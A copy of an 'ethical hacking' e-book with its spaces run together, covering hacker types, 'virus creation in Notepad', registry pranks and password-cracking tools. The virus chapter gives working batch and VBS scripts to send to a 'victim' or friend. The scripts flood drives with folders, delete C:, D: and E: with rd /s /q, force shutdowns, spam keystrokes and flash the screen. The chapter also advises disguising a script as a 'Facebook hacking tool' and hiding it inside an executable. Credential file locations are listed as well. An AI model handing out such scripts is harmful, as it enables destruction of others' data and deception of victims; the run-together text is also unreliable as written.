Post on 09-Dec-2015
description
BY:UJJWALSAHAYCO-FOUNDER[www.thebigcomputing.com]
FINDOUTMORESTUFFLIKETHISON
TheBigComputing.com
WecoveruniqueEthicalHackingandPerformanceimprovementguides,NewsandTutorials.Ouraimistomakeyourdigitallifeeasy,pleasantandsecure.Ujjwalisaregularauthorandalsochiefsecurityadministratorattheplace,youcangetsolutionofyourqueries
LEGALDISCLAIMER
Anyproceedingsoractivitiesregardingthematerialcontainedwithinthisvolumeareexclusivelyyourliability.Themisuseandmistreatoftheinformation/tutorialinthisbookcanconsequenceinunlawfulchargesbroughtagainstthepersonsinquestion.Theauthorsandreviewanalyzerswillnotbeheldresponsibleintheeventanyunlawfulchargesbroughtagainstanyindividualsbymisusingtheinformationinthisbooktobreakthelaw.Thisbookcontainsmaterialandresourcesthatcanbepotentiallydestructiveordangerous.Ifyoudonotfullycomprehendsomethingonthisbook,don‘tstudythisbook.Pleaserefertothelawsandactsofyourstate/region/province/zone/territoryorcountrybeforeaccessing,using,orinanyotherwayutilizingtheseresources.Thesematerialsandresourcesareforeducationalandresearchpurposesonly.Donotattempttoviolatethelawwithanythingenclosedherewithin.Ifthisisyourintention,thenleavenow.Neitherwriterofthisbook,reviewanalyzers,thepublisher,noranyoneelseaffiliatedinanyway,isgoingtoadmitanyresponsibilityforyourproceedings,actionsortrials.
ABOUTTHEAUTHOR…
UJJWALSAHAYisasovereignComputerSecurityConsultantandhasstate-of-the-artfamiliarityinthefieldofcomputer.Also,UJJWALSAHAYisacyber-securityexpertcertifiedbyLUCIDEUSTECHandhasdefinitiveexperienceinthefieldofcomputersandethicalhacking.UjjwalSahayistheAuthorofthebookHACK-X
CRYPT(AstraightforwardguidetowardsEthicalhackingandcybersecurity).Also,UjjwalSahayistheCo-founderofthetechno-hackingwebsitewww.thebigcomputing.com,heisthechiefsecurityconsultantofsite.Sahayishowever,morewellknownforhissignificantworkinthefieldofethicalhackingandcybersecurity.SahayiscurrentlypursuinghisstudiesincomputersciencewithspecializationincybersecurityatMITSGWALIOR.GetInTouchWithHimAt
ujjwal@thebigcomputing.com
PREFACE
Computerhackingisthepracticeofalteringcomputerhardwareandsoftwaretocarryoutagoaloutsideofthecreator‘soriginalintention.Peoplewhoslotincomputerhackingactionsandactivitiesareoftenentitledashackers.Themajorityofpeopleassumethathackersarecomputercriminals.Theyfallshorttoidentifythefactthatcriminalsandhackersaretwoentirelyunrelatedthings.Hackersinrealismaregoodandextremelyintelligentpeople,whobyusingtheirknowledgeinaconstructivemodehelporganizations,companies,government,etc.tosecurecredentialsandsecretinformationontheInternet.Yearsago,noonehadtoworryaboutCrackersbreakingintotheircomputerandinstallingTrojanviruses,orusingyourcomputertosendattacksagainstothers.Nowthatthinghavechanged,it’sbesttobeawareofhowtodefendyourcomputerfromdamagingintrusionsandpreventblackhathackers.So,inthisBookyouwilluncoverthefinestwaystodefendyourcomputersystemsfromthehackersThisBookiswrittenbykeepingoneobjectinmindthatabeginner,whoisnotmuchfamiliarregardingcomputerhacking,caneasily,attemptsthesehacksandrecognizewhatwearetryingtodemonstrate.AfterReadingthisbookyouwillcometorecognizethathowHackingisaffectingoureverydayroutineworkandcanbeveryhazardousinmanyfieldslikebankaccounthackingetc.Moreover,aftercarryingoutthisvolumeindetailyouwillbecapableofunderstandingthathowahackerhacksandhowyoucandefendyourselffromthesethreats.
FORANYQUERIESANDSUGGESTIONSFEELFREETOCONTACTME:ujjwal@thebigcomputing.com
InTheLovingMemoryofmyDAD
YourhandssowarmYourvoicesoclearIstillrememberyourlaughterLikeyesterdayhadnevergoneImissyourwordsofencouragementWordsthatkeptmehangingonNowyouaregoneThetearskeepflowingOnlyhopingThatonedaythepainwillfadeDadwhydidyouhavetogoawayWeloveyouandmissyouIknowIwillagainseeyousomeday
ACKNOWLEDGEMENTS…
Bookorvolumeofthistemperamentistremendouslycomplextowrite,particularlywithoutsupportoftheAlmightyGOD.IamhighlythankfultoLATEDR.BAKSHIKAMESHWARSRIVASTAVA,MRS.SHASHIBALASRIVASTAVA,Mr.BAKSHIRAJESHPRASADSINHAANDMRS.ARADHNASINHAtotrustonmycapabilities,withouttheirsupportandmotivationitwouldnotbepromisingtowritethisbook.IexpressheartfeltcredittoMyParentsLATEPROF.SAMIRKUMARSAHAYandMRS.SUMANSAHAYwithoutthemIhavenoexistence.IamalsothankingMR.BAKSHIRAJEEVPRASADSINHA,MRS.ANITASINHA,MR.BAKSHISANJEEVPRASADSINHA,MRS.PRITYSINHA,MR.RAJESHWARPRASADandMRS.PUNAMSINHAwhohelpedmeateachandeverystepofmylifebytheirprecioussupport.
IammorethaneverthankfultomycolleagueSaurabhTripathi(Creativehead@THEBIGCOMPUTING)forthereview,analysisandsuggestionsforsomegoodarticlesforthisbookandallindividualswhofacilitatedmeatvariousresearchstagesofthisvolume.
UJJWALSAHAY
FOOLISHASSUMPTIONS…
Imakeafewassumptionsaboutyou:You’refamiliar withbasiccomputer-,networking–relatedconceptsandterms.Youhaveabasicunderstandingofwhathackersandmalicioususersdo.Youhaveaccesstoacomputerandanetworkonwhichtousethesetechniques.YouhaveaccesstotheInternettoobtainthevarioustoolsusedintheethicalhackingprocess.Youhavepermissiontoperformthehackingtechniquesdescribedinthisbook.
TableofContents
INTRODUCTIONTOHACKERS……………………………………………………………..17CommunitiesofHackers:-………………………………………………………………..17INTENSIONOFHACKERS:…………………………………………………………………17TypesofHackers:
……………………………………………………………………………….18•WhiteHatHackers…………………………………………………………………………..18•BlackHatHackers……………………………………………………………………………18•GreyHatHackers……………………………………………………………………………..18CRACKERS…………………………………………………………………………………………..19Intensionofcrackers:-………………………………………………………………………19PHREAKS…………………………………………………………………………………………….19Intentionofphreaks:-………………………………………………………………………..19SCRIPTKIDDIES:-………………………………………………………………………………20Intentionofscriptkiddies:-……………………………………………………………….20BlackHatHackersStrategy:-……………………………………………………………20HACKERSWANTYOURPC…………………………………………………………………..23CREATIONOFVIRUSINNOTEPAD……………………………………………………..26
1.)Tocreateahugeamountoffoldersonvictim’sdesktopscreen:……………………………………………………………………………………………………………..262.)TocreatemorefoldersinC,D,andEdriveofvictim’scomputer:……………………………………………………………………………………………………………..29
3.)ToformatC,D:andE:driveofyourcomputer:-…………………………304.)Conveyyourfriendalittlemessageandshutdownhis/hercomputer:-………………………………………………………………………………………….30
5.)OpenNotepad,slowlytype“Hello,howareyou?Iamgoodthanks”andfreakyourfriendout:-………………………………………………………………..316.)Hackyourfriend’skeyboardandmakehimtype“Youareafool”simultaneously:-………………………………………………………………………………..33
7.)OpenNotepadcontinuallyinyourfriend’scomputer:……………….338.)THRETENYOURFRIENDBYMAKINGSCREENFLASH……………..34ConvertBatchfilesintoExecutablePrograms…………………………………..37HACKING“OPEN”OPTION…………………………………………………………………..42PASSWORDCRACKING………………………………………………………………………..50Crackingpasswordswithhardcoretools…………………………………………51
Password-crackingsoftware:-…………………………………………………………51Cain&Abel:-……………………………………………………………………………………….51Brutus:-……………………………………………………………………………………………….52ElcomsoftDistributedPasswordRecovery:……………………………………52ElcomsoftSystemRecovery:…………………………………………………………….52JohntheRipper…………………………………………………………………………………..52ophcrack……………………………………………………………………………………………..53Aircrack-NG………………………………………………………………………………………..53ProactiveSystemPasswordRecovery…………………………………………….53RainbowCrack……………………………………………………………………………………53pwdump3……………………………………………………………………………………………54PASSWORDCREATINGPOLICIES………………………………………………………..57BYPASSWINDOWSLOGONSCREENPASSWORD…………………………….60KEYSTROKELOGGING………………………………………………………………………….63LearnHowtoHackWindowsExperienceIndex…………………………………66HACKTOHIDELOCALDRIVES…………………………………………………………….71FORMATHARDDISKWITHNOTEPAD……………………………………………….78FUNNYVIRUSTOSHOCKYOURFRIENDS………………………………………….81HOWTOCHANGEYOURPROCESSORNAME……………………………………85HOWTOMAKEYOURGOOGLESEARCHSEFFECTIVE………………………93IOSPASSWORDCRACKING………………………………………………………………….96HACKTOHIDETHERECYCLEBIN……………………………………………………..103HOWBOTNETDDoSATTACKWORKS………………………………………………106DDoSAttack?……………………………………………………………………………………106Botnet?……………………………………………………………………………………………..107BotnetTools……………………………………………………………………………………..108
SlowLoris…………………………………………………………………………………………..109Tor’sHammer…………………………………………………………………………………..109Qslowloris…………………………………………………………………………………………109ApacheKiller……………………………………………………………………………………..110PyLoris………………………………………………………………………………………………110DDoSim……………………………………………………………………………………………..110BotnetDDoSAttacks……………………………………………………………………….110WEBSITEHACKING……………………………………………………………………………..113TESTINGSQLINJECTIONBYUSINGTOOL………………………………………..130WI-FIHACKINGUSINGBACKTRACK………………………………………………….134NEWBIE’SWAYTOWARDSREVERSEENGINEERING……………………..143EMAILANDFACEBOOKHACKINGBYPHISHING……………………………..149SecuringPenDrivesFromMaliciousViruses……………………………………155HOWTOPROTECTYOURPDFFILESFROMCOPYING…………………….160SENDINGAMESSAGETOOTHERUSERINYOURPC……………………..166HOWTOCREATEAFOLDERWITHEMPTYNAME…………………………..170HACKINGANDROIDPHONE……………………………………………………………….173FULLCONTROLYOURPCBYPHONE………………………………………………..178LAUNCHINGWINDOWSGODMODE…………………………………………………183HOWTOCRACKANDROIDLOCKSCREEN………………………………………..187WI-FICRACKINGUSINGREAVERINBACKTRACK……………………………191SOMEUSEFULWINDOWSSHORTCUTS…………………………………………..196HOWTORECOVERPERMANENTLYDELETEDFILES………………………198CONCLUSION:-……………………………………………………………………………………203
Let’sstartINTRODUCTION
INTRODUCTIONTOHACKERS
Firstofallbeforediggingintointensehackingprocesseslet’stakealookonwhathackingis,whothehackersare,whataretheirintentions,typesofhackersandtheircommunitiesetc.
CommunitiesofHackers:
HACKERSCRACKERSPHREAKSSCRIPTKIDDIES
HACKERSaretheIntelligentComputerExperts.INTENSIONOFHACKERS:
•Togainin-depthknowledgeofanycomputersystem,whatishappeningatthebackendofanyspecificprogramofthesystembehindthescreenofthecomputersystem?
•Theirmotiveistofindpossiblesecurityriskandvulnerabilitiesinacomputersystemornetwork.
•Theycreatesecurityawarenessamongthepeoplebysharingknowledgeandpropersecuritypreventionsthatshouldbetakenbytheuser.
TypesofHackers:
•WhiteHatHackers–“Whitehats”isthenameusedforsecurityexperts.Whiletheyoftenusethesametoolsandtechniquesastheblackhats,theydosoinordertofoilthebadguys.Thatis,theyusethosetoolsforethicalhackingandcomputerforensics.Ethicalhackingistheprocessofusingsecuritytoolstotestandimprovesecurity(ratherthantobreakit!).Computerforensicsistheprocessofcollectingevidenceneededtoidentifyandconvictcomputercriminals.
•BlackHatHackers–Theyusetheirknowledgeandskillsetforillegalactivitiesanddestructiveintents.Obviously,the“blackhats”arethebadguys.Thesearethepeoplewhocreateandsendvirusesandworms,breakintocomputersystems,stealdata,shutdownnetworks,andbasicallycommitelectroniccrimes.Wetalkaboutblackhatsatseveralpointsinthisbook.Blackhathackersandmalwarewritersarenotconsideredasthesamethinginthesecuritycommunity—eventhoughtheyarebothbreakingthelaw.
•GreyHatHackersTheyusetheirknowledgeandskillsetforthelegalandillegalpurpose.Theyarewhitehatsinpublicbutinternallytheydosomeblackhatwork.Grayhatssitinthemiddleofthefencebecausesometimestheycrossthatethicalline(ormoreoften,defineitdifferently).Forexample,grayhatswillbreakintoacompany’scomputersystemjusttowanderaroundandseewhat’sthere.Theythinkthatsimplybecausetheydon’tdamageanydata,they’renotcommittingacrime.Thentheygoandapplyforjobsassecurityconsultantsforlargecorporations.Theyjustifytheirearlierbreak-inassomesort
ofcomputersecuritytraining.Manyreallybelievethatthey’reprovidingapublicservicebylettingcompaniesknowthattheircomputersareatrisk.
CRACKERSarethosewhobreakintotheapplicationswithsomemaliciousintentionseitherfortheirpersonalgainortheirgreedyachievements.
Intensionofcrackers:•Theirmotiveistogetunauthorizedaccessintoasystemandcausedamageordestroyorrevealconfidentialinformation.•Tocompromisethesystemtodenyservicestolegitimateusersfortroubling,harassingthemorfortakingrevenge.•Itcancausefinanciallosses&image/reputationdamages,defamationinthesocietyforindividualsororganizations.
PHREAKSarethosepeoplewhousecomputerdevicesandsoftwareprogramsandtheirtrickyandsharpmindtobreakintothephonenetworks.
Intentionofphreaks:
•Tofindloopholesinsecurityinphonenetworkandtomakephonecallsandaccessinternetatfreeofcost!!!Youmaygetaspoofedcallorabigamountofbill.Youcanalsogetacallwithyourownnumber.
SCRIPTKIDDIES:Thesearecomputernoviceswhotakeadvantageofthehackertools,vulnerabilityscanners,anddocumentationavailablefreeontheInternetbutwhodon’thaveanyrealknowledgeofwhat’sreallygoingonbehindthescenes.Theyknowjustenoughtocauseyouheadachesbuttypicallyareverysloppyintheiractions,leavingallsortsofdigitalfingerprintsbehind.Eventhoughtheseguysarethestereotypicalhackersthatyouhearaboutinthenewsmedia,theyoftenneedonlyminimalskillstocarryouttheirattacks.
Intentionofscriptkiddies:•Theyusetheavailableinformationaboutknownvulnerabilitiestobreakintothenetworksystems.•It’sanactperformedforafunoroutofcuriosity.BlackHatHackersStrategy:•InformationGathering&Scanning•GettingAccessonthewebsite•Maintaintheaccess•CleartheTracksConclusion:Securityisimportantbecausepreventionisbetterthancure.
HACKERSWANTYOURPC
HACKERSWANTYOURPC…
Youmightbethinkingthathackersdon’tcareaboutyourcomputer,buttheydo.Hackerswantaccesstoyoursystemformanydifferentreasons.Remember,onceahackerbreaksinandplantsaTrojan,thedoorisopenforanyonetoreturn.Thehackersknowthisandaremakingmoneyofffromit.Theyknowit’seasytohideandverydifficulttotrackthembackoncetheyownyourPC.
Overall,theInternetisaneasyplacetohide.Compromisedcomputersaroundtheworldhavehelpedtomakehidingsimple.ItiseasytofindthelastIPaddressfromwhereanattackwaslaunched,buthackershopfrommanyunsecuredsystemstohidetheirlocationbeforetheylaunchattacks.
IPaddressisauniqueaddressthatidentifieswhereacomputerisconnectedtotheInternet.Everycomputer,evenyoursifyou’reusingbroadbandaccess,hasanInternetprotocol(IP)address.
Overthepastfouryears,mostcyber-attackshavebeenlaunchedfromcomputerswithintheINDIA.However,thisdoesn’tmeanthatsystemsintheINDIAaretheoriginalsourceoftheattack.AhackerinPakistancouldactuallyuseyourcomputertolaunchadenialofservice(DOS)attack.Totheentireworld,itmightevenlookasifyoustartedtheattackbecausethehackerhashiddenhistrackssothatonlythelast“hop”canbetraced
.
VIRUSCREATIONS
CREATIONOFVIRUSINNOTEPAD
Now,it’stimetoadministrateyourcomputerbycreatingsomevirusesintheformofbatchfile.Youcancreatevarioustypesofviruseswithhavingdistinctfunctionality.Eachandeveryviruswillaffectthevictim’scomputersystembythewayyouhavecodeditsprogramminginthebatchfile.Youcancreateviruseswhichcanfreezethevictim’scomputeroritcanalsocrashit.
Viruscreationcodesofthebatchfile:-—Codestobewritteninthenotepad-—Extensionofthefilesshouldbe“.bat”-
1.)Tocreateahugeamountoffoldersonvictim’sdesktopscreen:Firstofallyourtaskistocopythefollowingcodesinthenotepadofyourcomputer.Foropeningthenotepad:Gotorunoptionofyourcomputerbypressing“window+R”.Simplytype“notepad”andclickontheOKoption.
CODES:@echooff:topmd%random%gototop.
Nowwhenyouhavecopiedthecodesinthenotepadyournextworkistosavethetextdocumentyouhavecreated.Gotofileoptionandsaveyourdocumentbyanynamebut“don’tforgettokeeptheextensionas‘.bat’.
Forexampleyoucansaveyourtextdocumentbythename“ujjwal.bat”
Oryoucanalsokeepyourdocumentnameas“Facebookhackingtool.bat”toconfusethevictimandenforcehimtoopenthevirusyouhavecreatedtodestroythedesktopofthevictim.
Whenyouhavedonesavingthedocumentjustdoubleclickonthebatchfiletoopenit.
Suddenlyyouwillseethatthecommandpromptofthevictim’scomputeropenedautomaticallyanditwilldisplaylargeamountofcodestorunninginthecommandprompt.After5-10secondsyouwillseethatthereareahugeamountoffolderscreatedautomaticallyonthedesktopofthevictimanditwillalsoleadsthedesktoptofreezeorcrash.
2.)TocreatemorefoldersinC,D,andEdriveofvictim’scomputer:-
Aswehavelearnedabovetocreatemanyfoldersonthedesktopofthevictim,inthesamewaywecancreatealotoffoldersintheC:,D:,andE:drivesofthevictimscomputerbyapplyingthesamemethodaswehavefollowedabovebutthereisalittleamendmentinthecodesofthebatchfileofthisvirus.
CODES:@echooff
:VIRUScd/dC:md%random%cd/dD:md%random%cd/dE:md%random%gotoVIRUS
Copyandpastetheabovecodeinthenotepadandfollowthesamestepsaswehavefollowedbeforetocreatemorenumbersoffoldersinthelocaldrivesofthevictim’scomputer.
3.)ToformatC,D:andE:driveofyourcomputer:
OpenNotepadCopythebelowcommandthere“rd/s/qD:\rd/s/qC:\rd/s/qE:"(Withoutquotes)Saveas“anything.bat
Doubleclickonthevirusicon.ThisvirusformatstheC,DandEDrivein5Seconds.4.)Conveyyourfriendalittlemessageandshutdownhis/hercomputer:
@echooffmsg*Idon’tlikeyoushutdown-c“Error!Youaretoostupid!”-s
Saveitas“Anything.BAT”inAllFilesandsendit.
5.)OpenNotepad,slowlytype“Hello,howareyou?Iamgoodthanks”andfreakyourfriendout:
Openthenotepadandtypethefollowingcode:WScript.Sleep180000WScript.Sleep10000SetWshShell=WScript.CreateObject(“WScript.Shell”)WshShell.Run“notepad”WScript.Sleep100WshShell.AppActivate“Notepad”WScript.Sleep500WshShell.SendKeys“Hel”WScript.Sleep500WshShell.SendKeys“lo“WScript.Sleep500WshShell.SendKeys“,ho”WScript.Sleep500WshShell.SendKeys“wa”WScript.Sleep500WshShell.SendKeys“re“WScript.Sleep500WshShell.SendKeys“you”WScript.Sleep500WshShell.SendKeys“?”WScript.Sleep500WshShell.SendKeys“Ia”WScript.Sleep500WshShell.SendKeys“mg”WScript.Sleep500WshShell.SendKeys“ood”WScript.Sleep500WshShell.SendKeys”th”WScript.Sleep500WshShell.SendKeys“ank”WScript.Sleep500
WshShell.SendKeys“s!“
Saveitas“Anything.VBS”andsendit.6.)Hackyourfriend’skeyboardandmakehimtype“Youareafool”simultaneously:Openthenotepadandtypethefollowingcodes:
SetwshShell=wscript.CreateObject(“WScript.Shell”)dowscript.sleep100wshshell.sendkeys“Youareafool.”loop
Saveitas“Anything.VBS”andsendit.7.)OpenNotepadcontinuallyinyourfriend’scomputer:
Openthenotepadandtypethefollowingcodes:@ECHOoff:topSTART%SystemRoot%\system32\notepad.exeGOTOtop
Saveitas“Anything.BAT”andsendit.8.)THRETENYOURFRIENDBYMAKINGSCREENFLASH
Tomakeareallycoolbatchfilethatcanmakeyourentirescreenflashrandomcolorsuntilyouhitakeytostopit,simplycopyandpastethefollowingcodeintonotepadandthensaveitasa.batfile.
@echooffechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbg
ButifyoureallywanttomesswithafriendthencopyandpastethefollowingcodewhichwilldothesamethingexceptwhentheypressakeythescreenwillgoblackandtheonlywaytostopthebatchfileisbypressingCTRL-ALT-DELETE.Codes:
@echooff:aechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbggotoa
Todisableerror(ctrl+shirt+esc)thenendprocesswscript.exeEnjoy!!!Note:-someoftheabovegivencodescanharmyourcomputerafterexecutionso;don’ttryitonyourpc.You
canuseatestcomputerforit.
BATCHTOEXECONVERSION
ConvertBatchfilesintoExecutablePrograms
Thebatchfilesandtheexecutablefilesworkinalmostsimilarway.Basicallybothareasmuchasasetofinstructionsandlogicsforthecommandexecution.Butmorepreferablywetreatexecutablefilesastheyaremoreconvenientthanbatchone.Butwhywouldwewantthat?Someofthereasonsarelistedbelow:1.WecanincludeextratoolsinourEXEdependentbatchfile.
2.MoreoverEXEprovidesprotectiontothesourcescripttorestrictmodification.3.EXEfilescanbepinnedtowindowsstartmenuaswellasinthetaskbar.Hereweareusingatoolcalled“Batchtoexeconverter”whichprovidesyouaplatformtorunthebatchfilesasexecutablefiles.Youcandownloaditfromhere
“BattoExeConverter”isaflowconversionprogramwhosepurposeistohelpyoutoeasilyobtainexecutablefilesoutofbatchitems.IfyouprefertoconvertaBATCHfileintoanexecutableoneeasily,“BattoExeConverter”isasimpleandyeteffectivesolution.
Theapplicationprovidesyouwithasimplifiedinterface,whichmakesitcomfortableforbothbeginnerandadvancedusers.Fromitsprimarywindow,youhavetheabilitytoselectthedesiredbatchfileandoutputfile.Then,youwillbeabletocustomizeyoursettingsaccordingtoyourchoiceandpreferences.
AnotherinterestingandcompactiblefeatureisthatyoucanchoosethelanguageforyourEXEfile,thechoicesbeingEnglishorGerman.FromtheOptionstab,userscanopttocreateavisibleorinvisibleapplication,whichmeansdisplayingaconsolewindowornot.However,ifyouwanttoencrypttheresultingEXEfile,youcanprotectitwithasecuritypassword.
MESSINGUPWITHREGISTRY
HACKING“OPEN”OPTION
IfwewanttoopenanyfoldereitherweusetodoubleclickonthefolderorwejustrightclickonthefolderanditwillshowusadialogueboxwithOPENoptionatthetopofthedialoguebox.
Andtodaywearegoingtolearnthathowtohackthe“OPEN”optionbyanytextbywhichyouwanttoreplaceit.STEPS:Goto“run”optionandtype“regedit”andclickonok.Note:“regedit”standsforregistryediting.
Registry:-itisresponsibleforsavingthebinaryequivalentworkingofeveryapplicationinoperatingsystem.
Thenawindowwillopeninfrontofyouofregistryediting.Ithasfiveoptions.
1.HKEY_CLASSES_ROOT2.HKEY_CURRENT_USER3.HKEY_LOCAL_MACHINE4.HKEY_USERS5.HKEY_CURRENT_CONFIG
Thenyouhavetoclickon“HKEY_CLASSES_ROOT”Itwillopenandyouseealotofitemsunderit.Searchforthe“FOLDER”optionunderit.
Clickonthefolderoptiontoopenit.Whenyouopenfolderoptionyouwillseethe“SHELL”option.Byopeningthe“SHELL”optionyouwillseethe“OPEN”optionunderit.JustgiveasingleclickontheopenoptioninsteadopeningitYouwillseetwoitemsdefinedintheleftwhiteworkspace.
Justopenthe“Default”string(1stoption).Donottouchthevaluename.Typeanythingbywhichyouwanttoreplaceyour“open”option.
ForexampleIamtypingherethat“yourcomputerishackedbyUjjwalSahay”.
Thenclickonokoption.Nowgoonanyfolderandjustgivearightclicktoit.
Woooooo!Nowtheopenoptionischangedbythetext“yourcomputerishackedbyUjjwalSahay”.
PASSWORDCRACKINGEXPLAINED
PASSWORDCRACKING
Passwordcrackersarethemostfamousandelementarytoolsinthehacker’stoolbox.Thesehavebeenaroundforsometimeandarefairlyeffectiveat“guessing”mostusers’passwords,atleastinpartbecausemostusersdoaverypoorjobofselectingsecurepasswords.
Firstofallifahackerisgoingtocrackyourpasswordthenattheveryfirststeptheyusuallytrysomeguessestocrackyourpassword.Theygenerallymadeiteasybysocialengineering.Hackersknowthatmostusersselectsimplepasswordsthatareeasytoremember.Thetopchoicesoftheusersarenearlyalwaysnamesthatarepersonallymeaningfultotheuser—firstnamesofimmediatefamilymembersleadthelist,followedbypet’snamesandfavoritesportingteams.PasswordcrackersmayenduploadingfullEnglishdictionaries,buttheycanhitafairnumberofpasswordswiththecontentsofanypopularbabynamebook.Otherpoorpasswordselectionsincludecommonnumbersandnumbersthatfollowacommonformatsuchasphonenumbersandsocialsecuritynumbers.
Compoundingtheproblem,manyuserssetthesameusernameandpasswordforallaccounts,allowinghackerstohaveafielddaywithasingleharvestedpassword.That’ssomethingtoconsiderbeforeyouusethesamepasswordforFacebookasyouuseatschooloratwork.Thekeytocreatingagoodpasswordistocreatesomethingthatsomeonecannotguessoreasilycrack.Usingyourpet’snamethereforeisnotagoodtechnique.Usingyourloginnameisalsoabadtechniquebecausesomeonewhoknowsyourlogin(oryourname,sincemanyloginnamesaresimplyvariationsonyoursurname),couldeasilybreakintoyoursystem.
Crackingpasswordswithhardcoretools
High-techpasswordcrackinginvolvesusingaprogramthattriestoguessapasswordbydeterminingallpossiblepasswordcombinations.Thesehigh-techmethodsaremostlyautomatedafteryouaccessthecomputerandpassworddatabasefiles.Themainpassword-crackingmethodsaredictionaryattacks,bruteforceattacks,andrainbowattacks.Youfindouthoweachoftheseworkinthefollowingsections.
Password-crackingsoftware:Youcantrytocrackyourorganization’soperatingsystemandapplicationpasswordswithvariouspassword-crackingtools:
Cain&Abel:CainandAbelisawell-knownpasswordcrackingtoolthatiscapableofhandlingavarietyoftasks.ThemostnotablethingisthatthetoolisonlyavailableforWindowsplatforms.Itcanworkassnifferinthenetwork,crackingencryptedpasswordsusingthedictionaryattack,bruteforceattacks,cryptanalysisattacks,revealingpasswordboxes,uncoveringcachedpasswords,decodingscrambledpasswords,andanalyzingroutingprotocols.ItusetocracksLMandNTLanManager(NTLM)hashes,WindowsRDPpasswords,CiscoIOSandPIXhashes,VNCpasswords,RADIUShashes,andlots
more.(Hashesarecryptographicrepresentationsofpasswords.)
Brutus:Brutusisoneofthemostpopularremoteonlinepasswordcrackingtools.Itclaimstobethefastestandmostflexiblepasswordcrackingtool.ThistoolisfreeandisonlyavailableforWindowssystems.ItwasreleasedbackinOctober2000.
ItsupportsHTTP(BasicAuthentication),HTTP(HTMLForm/CGI),POP3,FTP,SMB,TelnetandothertypessuchasIMAP,NNTP,NetBus,etc.Youcanalsocreateyourownauthenticationtypes.Thistoolalsosupportsmulti-stageauthenticationenginesandisabletoconnect60simultaneoustargets.Italsohasresumedandloadoptions.So,youcanpausetheattackprocessanytimeandthenresumewheneveryouwanttoresume.
ElcomsoftDistributedPasswordRecovery:
(www.elcomsoft.com/edpr.html)cracksWindows,MicrosoftOffice,PGP,Adobe,iTunes,andnumerousotherpasswordsinadistributedfashionusingupto10,000networkedcomputersatonetime.Plus,thistoolusesthesamegraphicsprocessingunit(GPU)videoaccelerationastheElcomsoftWirelessAuditortool,whichallowsforcrackingspeedsupto50timesfaster.
ElcomsoftSystemRecovery:(www.elcomsoft.com/esr.html)cracksOrresetsWindowsuserpasswords,setsadministrativerights,andresetspasswordexpirationsallfromabootableCD.
JohntheRipper:-(www.openwall.com/john)JohntheRipperisanotherwell-knownfreeopensourcepasswordcrackingtoolforLinux,UNIXandMacOSX.AWindowsversionisalsoavailable.Thistoolcandetectweakpasswords.Aproversionofthetoolisalsoavailable,whichoffersbetterfeaturesandnativepackagesfortargetoperatingsystems.
ophcrack:(http://ophcrack.sourceforge.net)cracksWindowsUserpasswordsusingrainbowtablesfromabootableCD.Rainbowtablesarepre-calculatedpasswordhashesthatcanhelpspeedupthecrackingprocess.
Aircrack-NG:-(http://www.aircrack-ng.org/)Aircrack-NGisaWiFipasswordcrackingtoolthatcancrackWEPorWPApasswords.Itanalyzeswirelessencryptedpacketsandthentriestocrackpasswordsviaitscrackingalgorithm.ItisavailableforLinuxandWindowssystems.AliveCDofAircrackisalsoavailable.
ProactiveSystemPasswordRecovery:
(www.elcomsoft.com/pspr.html)recoverspracticallyanylocallystoredWindowspassword,suchAslogonpasswords,WEP/WPApassphrases,SYSKEYpasswords,andRAS/dialup/VPNpasswords.
RainbowCrack:-(http://project-rainbowcrack.com)RainbowCrackisahashcrackertoolthatusesalarge-scaletime-memorytradeoffprocessforfasterpasswordcrackingthantraditionalbruteforcetools.Time-memorytradeoffisacomputationalprocessinwhichallplaintextandhashpairsarecalculatedbyusingaselectedhashalgorithm.Aftercomputation,resultsarestoredintherainbowtable.Thisprocessisverytimeconsuming.But,oncethetableisready,itcancrackapasswordmustfasterthanbruteforcetools.
Youalsodonotneedtogeneraterainbowtabletsbyyourselves.DevelopersofRainbowCrackhavealsogeneratedLMrainbowtables,NTLMrainbowtables,MD5rainbowtablesandSha1rainbowtables.LikeRainbowCrack,thesetablesarealsoavailableforfree.Youcandownloadthesetablesanduseforyourpasswordcrackingprocesses.
pwdump3:-(www.openwall.com/passwords/microsoftwindowsnt-2000-xp-2003-vista-7#pwdump)passwordhashesfromtheSAM(Securitydatabase.extractsAccountsWindowsManager)
Passwordstoragelocationsvarybyoperatingsystem:Windowsusuallystorespasswordsintheselocations:
•ActiveDirectorydatabasefilethat’sstoredlocallyorspreadacrossdomaincontrollers(ntds.dit)WindowsmayalsostorepasswordsinabackupoftheSAMfileinthec:\winnt\repairorc:\windows\repairdirectory.
•SecurityAccountsManager(SAM)database(c:\winnt\system32\config)or(c:\windows\system32\config)
SomeWindowsapplicationsstorepasswordsintheRegistryorasplaintextfilesontheharddrive!Asimpleregistryorfile-systemsearchfor“password”mayuncoverjustwhatyou’relookingfor.
LinuxandotherUNIXvariantstypicallystorepasswordsinthesefiles:•/etc/passwd(readablebyeveryone)•/etc/shadow(accessiblebythesystemandtherootaccountonly)•/.secure/etc/passwd(accessiblebythesystemandtherootaccountonly)•/etc/security/passwd(accessiblebythesystemandtherootaccountonly)
MUSTHAVEPASSWORDPOLICIES
PASSWORDCREATINGPOLICIES
Asanethicalhacker,youshouldshowuserstheimportanceofsecuringtheirpasswords.Herearesometipsonhowtodothat:
Demonstratehowtocreatesecurepasswords:-generallypeopleusetocreatetheirpasswordsusingonlywords,whichcanbelesssecure.
Showwhatcanhappenwhenweakpasswordsareusedorpasswordsareshared.Diligentlybuilduserawarenessofsocialengineeringattacks:Encouragetheuseofastrongpassword-creationpolicythatincludesthefollowingcriteria:Usepunctuationcharacterstoseparatewords.
Useupperandlowercaseletters,specialcharacters,andnumbers.Neveruseonlynumbers.Suchpasswordscanbecrackedquickly.
Changepasswordsevery15to30daysorimmediatelyifthey’resuspectedofbeingcompromised.
